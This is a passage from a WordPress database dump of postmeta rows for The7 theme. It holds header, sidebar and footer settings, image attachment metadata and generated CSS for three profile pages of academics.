(17612,2984,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17613,2987,'_edit_lock','1667593323:1'),
(17614,2988,'_wp_attached_file','2022/11/ws188.jpg'),
(17615,2988,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:99;s:6:\"height\";i:126;s:4:\"file\";s:17:\"2022/11/ws188.jpg\";s:8:\"filesize\";i:23543;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17616,2987,'_thumbnail_id','2988'),
(17617,2987,'_edit_last','1'),
(17618,2987,'_dt_sidebar_position','disabled'),
(17619,2987,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17620,2987,'_dt_sidebar_hide_on_mobile','0'),
(17621,2987,'_dt_footer_show','0'),
(17622,2987,'_dt_footer_widgetarea_id','sidebar_2'),
(17623,2987,'_dt_footer_hide_on_mobile','0'),
(17624,2987,'_dt_header_title','fancy'),
(17625,2987,'_dt_header_background','normal'),
(17626,2987,'_dt_header_background_below_slideshow','disabled'),
(17627,2987,'_dt_header_transparent_bg_color_scheme','light'),
(17628,2987,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17629,2987,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17630,2987,'_dt_header_transparent_bg_color','#000000'),
(17631,2987,'_dt_header_transparent_bg_opacity','50'),
(17632,2987,'_dt_header_disabled_background','normal'),
(17633,2987,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17634,2987,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17635,2987,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17636,2987,'_dt_header_disabled_transparent_bg_color','#000000'),
(17637,2987,'_dt_header_disabled_transparent_bg_opacity','50'),
(17638,2987,'_dt_page_overrides_top_margin',''),
(17639,2987,'_dt_page_overrides_right_margin',''),
(17640,2987,'_dt_page_overrides_bottom_margin',''),
(17641,2987,'_dt_page_overrides_left_margin',''),
(17642,2987,'_dt_mobile_page_padding_top',''),
(17643,2987,'_dt_mobile_page_padding_right',''),
(17644,2987,'_dt_mobile_page_padding_bottom',''),
(17645,2987,'_dt_mobile_page_padding_left',''),
(17646,2987,'_dt_fancy_header_layout_heading',''),
(17647,2987,'_dt_fancy_header_title_aligment','center'),
(17648,2987,'_dt_fancy_header_height','300'),
(17649,2987,'_dt_fancy_header_padding-top','0px'),
(17650,2987,'_dt_fancy_header_padding-bottom','0px'),
(17651,2987,'_dt_fancy_header_breadcrumbs_heading',''),
(17652,2987,'_dt_fancy_header_breadcrumbs','disabled'),
(17653,2987,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17654,2987,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17655,2987,'_dt_fancy_header_title_heading',''),
(17656,2987,'_dt_fancy_header_title_mode','custom'),
(17657,2987,'_dt_fancy_header_title','Friederike Reitze Karlsruhe Institute of Technology, GERMANY (WG IV/4)'),
(17658,2987,'_dt_fancy_header_title_font_size','30'),
(17659,2987,'_dt_fancy_header_title_line_height','36'),
(17660,2987,'_dt_fancy_header_text_transform','none'),
(17661,2987,'_dt_fancy_header_title_color_mode','color'),
(17662,2987,'_dt_fancy_header_title_color','#ffffff'),
(17663,2987,'_dt_fancy_header_subtitle_heading',''),
(17664,2987,'_dt_fancy_header_subtitle',''),
(17665,2987,'_dt_fancy_header_subtitle_font_size','18'),
(17666,2987,'_dt_fancy_header_subtitle_line_height','26'),
(17667,2987,'_dt_fancy_header_subtitle_text_transform','none'),
(17668,2987,'_dt_fancy_header_subtitle_color_mode','color'),
(17669,2987,'_dt_fancy_header_subtitle_color','#ffffff'),
(17670,2987,'_dt_fancy_header_bg_heading',''),
(17671,2987,'_dt_fancy_header_bg_color','#222222'),
(17672,2987,'_dt_fancy_header_bg_image_origin','custom'),
(17673,2987,'_dt_fancy_header_bg_image','a:0:{}'),
(17674,2987,'_dt_fancy_header_bg_repeat','no-repeat'),
(17675,2987,'_dt_fancy_header_bg_position_x','center'),
(17676,2987,'_dt_fancy_header_bg_position_y','center'),
(17677,2987,'_dt_fancy_header_bg_fullscreen','1'),
(17678,2987,'_dt_fancy_header_bg_overlay','0'),
(17679,2987,'_dt_fancy_header_overlay_color','#000'),
(17680,2987,'_dt_fancy_header_bg_overlay_opacity','50'),
(17681,2987,'_dt_fancy_header_scroll_effect','default'),
(17682,2987,'_dt_fancy_header_bg_parallax','0.5'),
(17683,2987,'_dt_fancy_header_responsiveness_heading',''),
(17684,2987,'_dt_fancy_header_responsiveness','enabled'),
(17685,2987,'_dt_fancy_header_responsiveness_switch','778px'),
(17686,2987,'_dt_fancy_header_responsive_height','70'),
(17687,2987,'_dt_fancy_header_responsive_font_size','30'),
(17688,2987,'_dt_fancy_header_responsive_title_line_height','38'),
(17689,2987,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17690,2987,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17691,2987,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17692,2987,'_dt_teammate_options_go_to_single','1'),
(17693,2987,'_dt_teammate_options_position',''),
(17694,2987,'_dt_teammate_options_website',''),
(17695,2987,'_dt_teammate_options_mail',''),
(17696,2987,'_dt_teammate_options_facebook',''),
(17697,2987,'_dt_teammate_options_twitter',''),
(17698,2987,'_dt_teammate_options_dribbble',''),
(17699,2987,'_dt_teammate_options_you-tube',''),
(17700,2987,'_dt_teammate_options_rss',''),
(17701,2987,'_dt_teammate_options_delicious',''),
(17702,2987,'_dt_teammate_options_flickr',''),
(17703,2987,'_dt_teammate_options_lastfm',''),
(17704,2987,'_dt_teammate_options_linkedin',''),
(17705,2987,'_dt_teammate_options_vimeo',''),
(17706,2987,'_dt_teammate_options_tumbler',''),
(17707,2987,'_dt_teammate_options_pinterest',''),
(17708,2987,'_dt_teammate_options_devian',''),
(17709,2987,'_dt_teammate_options_skype',''),
(17710,2987,'_dt_teammate_options_github',''),
(17711,2987,'_dt_teammate_options_instagram',''),
(17712,2987,'_dt_teammate_options_stumbleupon',''),
(17713,2987,'_dt_teammate_options_behance',''),
(17714,2987,'_dt_teammate_options_px-500',''),
(17715,2987,'_dt_teammate_options_tripedvisor',''),
(17716,2987,'_dt_teammate_options_vk',''),
(17717,2987,'_dt_teammate_options_foursquare',''),
(17718,2987,'_dt_teammate_options_xing',''),
(17719,2987,'_dt_teammate_options_weibo',''),
(17720,2987,'_dt_teammate_options_odnoklassniki',''),
(17721,2987,'_dt_teammate_options_research-gate',''),
(17722,2987,'_dt_teammate_options_yelp',''),
(17723,2987,'_dt_teammate_options_blogger',''),
(17724,2987,'_dt_teammate_options_soundcloud',''),
(17725,2987,'_dt_teammate_options_viber',''),
(17726,2987,'_dt_teammate_options_whatsapp',''),
(17727,2987,'_dt_teammate_options_reddit',''),
(17728,2987,'_dt_teammate_options_snapchat',''),
(17729,2987,'_dt_teammate_options_telegram',''),
(17730,2987,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17731,2989,'_edit_lock','1667593430:1'),
(17732,2990,'_wp_attached_file','2022/11/ws191.jpg'),
(17733,2990,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:110;s:6:\"height\";i:135;s:4:\"file\";s:17:\"2022/11/ws191.jpg\";s:8:\"filesize\";i:24254;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17734,2989,'_thumbnail_id','2990'),
(17735,2989,'_edit_last','1'),
(17736,2989,'_dt_sidebar_position','disabled'),
(17737,2989,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17738,2989,'_dt_sidebar_hide_on_mobile','0'),
(17739,2989,'_dt_footer_show','1'),
(17740,2989,'_dt_footer_widgetarea_id','sidebar_2'),
(17741,2989,'_dt_footer_hide_on_mobile','0'),
(17742,2989,'_dt_header_title','fancy'),
(17743,2989,'_dt_header_background','normal'),
(17744,2989,'_dt_header_background_below_slideshow','disabled'),
(17745,2989,'_dt_header_transparent_bg_color_scheme','light'),
(17746,2989,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17747,2989,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17748,2989,'_dt_header_transparent_bg_color','#000000'),
(17749,2989,'_dt_header_transparent_bg_opacity','50'),
(17750,2989,'_dt_header_disabled_background','normal'),
(17751,2989,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17752,2989,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17753,2989,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17754,2989,'_dt_header_disabled_transparent_bg_color','#000000'),
(17755,2989,'_dt_header_disabled_transparent_bg_opacity','50'),
(17756,2989,'_dt_page_overrides_top_margin',''),
(17757,2989,'_dt_page_overrides_right_margin',''),
(17758,2989,'_dt_page_overrides_bottom_margin',''),
(17759,2989,'_dt_page_overrides_left_margin',''),
(17760,2989,'_dt_mobile_page_padding_top',''),
(17761,2989,'_dt_mobile_page_padding_right',''),
(17762,2989,'_dt_mobile_page_padding_bottom',''),
(17763,2989,'_dt_mobile_page_padding_left',''),
(17764,2989,'_dt_fancy_header_layout_heading',''),
(17765,2989,'_dt_fancy_header_title_aligment','center'),
(17766,2989,'_dt_fancy_header_height','300'),
(17767,2989,'_dt_fancy_header_padding-top','0px'),
(17768,2989,'_dt_fancy_header_padding-bottom','0px'),
(17769,2989,'_dt_fancy_header_breadcrumbs_heading',''),
(17770,2989,'_dt_fancy_header_breadcrumbs','disabled'),
(17771,2989,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17772,2989,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17773,2989,'_dt_fancy_header_title_heading',''),
(17774,2989,'_dt_fancy_header_title_mode','custom'),
(17775,2989,'_dt_fancy_header_title','Prof. Dr. Ahmed Shaker, Toronto Metropolitan University, Canada'),
(17776,2989,'_dt_fancy_header_title_font_size','30'),
(17777,2989,'_dt_fancy_header_title_line_height','36'),
(17778,2989,'_dt_fancy_header_text_transform','none'),
(17779,2989,'_dt_fancy_header_title_color_mode','color'),
(17780,2989,'_dt_fancy_header_title_color','#ffffff'),
(17781,2989,'_dt_fancy_header_subtitle_heading',''),
(17782,2989,'_dt_fancy_header_subtitle',''),
(17783,2989,'_dt_fancy_header_subtitle_font_size','18'),
(17784,2989,'_dt_fancy_header_subtitle_line_height','26'),
(17785,2989,'_dt_fancy_header_subtitle_text_transform','none'),
(17786,2989,'_dt_fancy_header_subtitle_color_mode','color'),
(17787,2989,'_dt_fancy_header_subtitle_color','#ffffff'),
(17788,2989,'_dt_fancy_header_bg_heading',''),
(17789,2989,'_dt_fancy_header_bg_color','#222222'),
(17790,2989,'_dt_fancy_header_bg_image_origin','custom'),
(17791,2989,'_dt_fancy_header_bg_image','a:0:{}'),
(17792,2989,'_dt_fancy_header_bg_repeat','no-repeat'),
(17793,2989,'_dt_fancy_header_bg_position_x','center'),
(17794,2989,'_dt_fancy_header_bg_position_y','center'),
(17795,2989,'_dt_fancy_header_bg_fullscreen','1'),
(17796,2989,'_dt_fancy_header_bg_overlay','0'),
(17797,2989,'_dt_fancy_header_overlay_color','#000'),
(17798,2989,'_dt_fancy_header_bg_overlay_opacity','50'),
(17799,2989,'_dt_fancy_header_scroll_effect','default'),
(17800,2989,'_dt_fancy_header_bg_parallax','0.5'),
(17801,2989,'_dt_fancy_header_responsiveness_heading',''),
(17802,2989,'_dt_fancy_header_responsiveness','enabled'),
(17803,2989,'_dt_fancy_header_responsiveness_switch','778px'),
(17804,2989,'_dt_fancy_header_responsive_height','70'),
(17805,2989,'_dt_fancy_header_responsive_font_size','30'),
(17806,2989,'_dt_fancy_header_responsive_title_line_height','38'),
(17807,2989,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17808,2989,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17809,2989,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17810,2989,'_dt_teammate_options_go_to_single','1'),
(17811,2989,'_dt_teammate_options_position',''),
(17812,2989,'_dt_teammate_options_website',''),
(17813,2989,'_dt_teammate_options_mail',''),
(17814,2989,'_dt_teammate_options_facebook',''),
(17815,2989,'_dt_teammate_options_twitter',''),
(17816,2989,'_dt_teammate_options_dribbble',''),
(17817,2989,'_dt_teammate_options_you-tube',''),
(17818,2989,'_dt_teammate_options_rss',''),
(17819,2989,'_dt_teammate_options_delicious',''),
(17820,2989,'_dt_teammate_options_flickr',''),
(17821,2989,'_dt_teammate_options_lastfm',''),
(17822,2989,'_dt_teammate_options_linkedin',''),
(17823,2989,'_dt_teammate_options_vimeo',''),
(17824,2989,'_dt_teammate_options_tumbler',''),
(17825,2989,'_dt_teammate_options_pinterest',''),
(17826,2989,'_dt_teammate_options_devian',''),
(17827,2989,'_dt_teammate_options_skype',''),
(17828,2989,'_dt_teammate_options_github',''),
(17829,2989,'_dt_teammate_options_instagram',''),
(17830,2989,'_dt_teammate_options_stumbleupon',''),
(17831,2989,'_dt_teammate_options_behance',''),
(17832,2989,'_dt_teammate_options_px-500',''),
(17833,2989,'_dt_teammate_options_tripedvisor',''),
(17834,2989,'_dt_teammate_options_vk',''),
(17835,2989,'_dt_teammate_options_foursquare',''),
(17836,2989,'_dt_teammate_options_xing',''),
(17837,2989,'_dt_teammate_options_weibo',''),
(17838,2989,'_dt_teammate_options_odnoklassniki',''),
(17839,2989,'_dt_teammate_options_research-gate',''),
(17840,2989,'_dt_teammate_options_yelp',''),
(17841,2989,'_dt_teammate_options_blogger',''),
(17842,2989,'_dt_teammate_options_soundcloud',''),
(17843,2989,'_dt_teammate_options_viber',''),
(17844,2989,'_dt_teammate_options_whatsapp',''),
(17845,2989,'_dt_teammate_options_reddit',''),
(17846,2989,'_dt_teammate_options_snapchat',''),
(17847,2989,'_dt_teammate_options_telegram',''),
(17848,2989,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17849,2991,'_edit_lock','1667593525:1'),
(17850,2992,'_wp_attached_file','2022/11/ws192.jpg'),
(17851,2992,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:98;s:6:\"height\";i:136;s:4:\"file\";s:17:\"2022/11/ws192.jpg\";s:8:\"filesize\";i:27500;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17852,2991,'_thumbnail_id','2992'),
(17853,2991,'_edit_last','1'),
(17854,2991,'_dt_sidebar_position','disabled'),
(17855,2991,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17856,2991,'_dt_sidebar_hide_on_mobile','0'),
(17857,2991,'_dt_footer_show','0'),
(17858,2991,'_dt_footer_widgetarea_id','sidebar_2'),
(17859,2991,'_dt_footer_hide_on_mobile','0'),
(17860,2991,'_dt_header_title','fancy'),
(17861,2991,'_dt_header_background','normal'),
(17862,2991,'_dt_header_background_below_slideshow','disabled'),
(17863,2991,'_dt_header_transparent_bg_color_scheme','light'),
(17864,2991,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17865,2991,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17866,2991,'_dt_header_transparent_bg_color','#000000'),
(17867,2991,'_dt_header_transparent_bg_opacity','50'),
(17868,2991,'_dt_header_disabled_background','normal'),
(17869,2991,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17870,2991,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17871,2991,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17872,2991,'_dt_header_disabled_transparent_bg_color','#000000'),
(17873,2991,'_dt_header_disabled_transparent_bg_opacity','50'),
(17874,2991,'_dt_page_overrides_top_margin',''),
(17875,2991,'_dt_page_overrides_right_margin',''),
(17876,2991,'_dt_page_overrides_bottom_margin',''),
(17877,2991,'_dt_page_overrides_left_margin',''),
(17878,2991,'_dt_mobile_page_padding_top',''),
(17879,2991,'_dt_mobile_page_padding_right',''),
(17880,2991,'_dt_mobile_page_padding_bottom',''),
(17881,2991,'_dt_mobile_page_padding_left',''),
(17882,2991,'_dt_fancy_header_layout_heading',''),
(17883,2991,'_dt_fancy_header_title_aligment','center'),
(17884,2991,'_dt_fancy_header_height','300'),
(17885,2991,'_dt_fancy_header_padding-top','0px'),
(17886,2991,'_dt_fancy_header_padding-bottom','0px'),
(17887,2991,'_dt_fancy_header_breadcrumbs_heading',''),
(17888,2991,'_dt_fancy_header_breadcrumbs','disabled'),
(17889,2991,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17890,2991,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17891,2991,'_dt_fancy_header_title_heading',''),
(17892,2991,'_dt_fancy_header_title_mode','custom'),
(17893,2991,'_dt_fancy_header_title','Dr. Shabnam Jabari, University of New Brunswick'),
(17894,2991,'_dt_fancy_header_title_font_size','30'),
(17895,2991,'_dt_fancy_header_title_line_height','36'),
(17896,2991,'_dt_fancy_header_text_transform','none'),
(17897,2991,'_dt_fancy_header_title_color_mode','color'),
(17898,2991,'_dt_fancy_header_title_color','#ffffff'),
(17899,2991,'_dt_fancy_header_subtitle_heading',''),
(17900,2991,'_dt_fancy_header_subtitle',''),
(17901,2991,'_dt_fancy_header_subtitle_font_size','18'),
(17902,2991,'_dt_fancy_header_subtitle_line_height','26'),
(17903,2991,'_dt_fancy_header_subtitle_text_transform','none'),
(17904,2991,'_dt_fancy_header_subtitle_color_mode','color'),
(17905,2991,'_dt_fancy_header_subtitle_color','#ffffff'),
(17906,2991,'_dt_fancy_header_bg_heading',''),
(17907,2991,'_dt_fancy_header_bg_color','#222222'),
(17908,2991,'_dt_fancy_header_bg_image_origin','custom'),
(17909,2991,'_dt_fancy_header_bg_image','a:0:{}'),
(17910,2991,'_dt_fancy_header_bg_repeat','no-repeat'),
(17911,2991,'_dt_fancy_header_bg_position_x','center'),
(17912,2991,'_dt_fancy_header_bg_position_y','center'),
(17913,2991,'_dt_fancy_header_bg_fullscreen','1'),
(17914,2991,'_dt_fancy_header_bg_overlay','0'),
(17915,2991,'_dt_fancy_header_overlay_color','#000'),
(17916,2991,'_dt_fancy_header_bg_overlay_opacity','50'),
(17917,2991,'_dt_fancy_header_scroll_effect','default'),
(17918,2991,'_dt_fancy_header_bg_parallax','0.5'),
(17919,2991,'_dt_fancy_header_responsiveness_heading',''),
(17920,2991,'_dt_fancy_header_responsiveness','enabled'),
(17921,2991,'_dt_fancy_header_responsiveness_switch','778px'),
(17922,2991,'_dt_fancy_header_responsive_height','70'),
(17923,2991,'_dt_fancy_header_responsive_font_size','30'),
(17924,2991,'_dt_fancy_header_responsive_title_line_height','38'),
(17925,2991,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17926,2991,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17927,2991,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17928,2991,'_dt_teammate_options_go_to_single','1'),
(17929,2991,'_dt_teammate_options_position',''),
(17930,2991,'_dt_teammate_options_website',''),
(17931,2991,'_dt_teammate_options_mail',''),
(17932,2991,'_dt_teammate_options_facebook',''),
(17933,2991,'_dt_teammate_options_twitter',''),
(17934,2991,'_dt_teammate_options_dribbble',''),
(17935,2991,'_dt_teammate_options_you-tube',''),
(17936,2991,'_dt_teammate_options_rss',''),
(17937,2991,'_dt_teammate_options_delicious',''),
(17938,2991,'_dt_teammate_options_flickr',''),
(17939,2991,'_dt_teammate_options_lastfm',''),
(17940,2991,'_dt_teammate_options_linkedin',''),
(17941,2991,'_dt_teammate_options_vimeo',''),
(17942,2991,'_dt_teammate_options_tumbler',''),
(17943,2991,'_dt_teammate_options_pinterest',''),
(17944,2991,'_dt_teammate_options_devian',''),
(17945,2991,'_dt_teammate_options_skype',''),
(17946,2991,'_dt_teammate_options_github',''),
(17947,2991,'_dt_teammate_options_instagram',''),
(17948,2991,'_dt_teammate_options_stumbleupon',''),
(17949,2991,'_dt_teammate_options_behance',''),
(17950,2991,'_dt_teammate_options_px-500',''),
(17951,2991,'_dt_teammate_options_tripedvisor',''),
(17952,2991,'_dt_teammate_options_vk',''),
(17953,2991,'_dt_teammate_options_foursquare',''),
(17954,2991,'_dt_teammate_options_xing',''),
(17955,2991,'_dt_teammate_options_weibo',''),
(17956,2991,'_dt_teammate_options_odnoklassniki',''),
(17957,2991,'_dt_teammate_options_research-gate',''),
(17958,2991,'_dt_teammate_options_yelp',''),
(17959,2991,'_dt_teammate_options_blogger',''),
(17960,2991,'_dt_teammate_options_soundcloud',''),
(17961,2991,'_dt_teammate_options_viber',''),
(17962,2991,'_dt_teammate_options_whatsapp',''),
(17963,2991,'_dt_teammate_options_reddit',''),
(17964,2991,'_dt_teammate_options_snapchat',''),
(17965,2991,'_dt_teammate_options_telegram',''),
(17966,2991,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
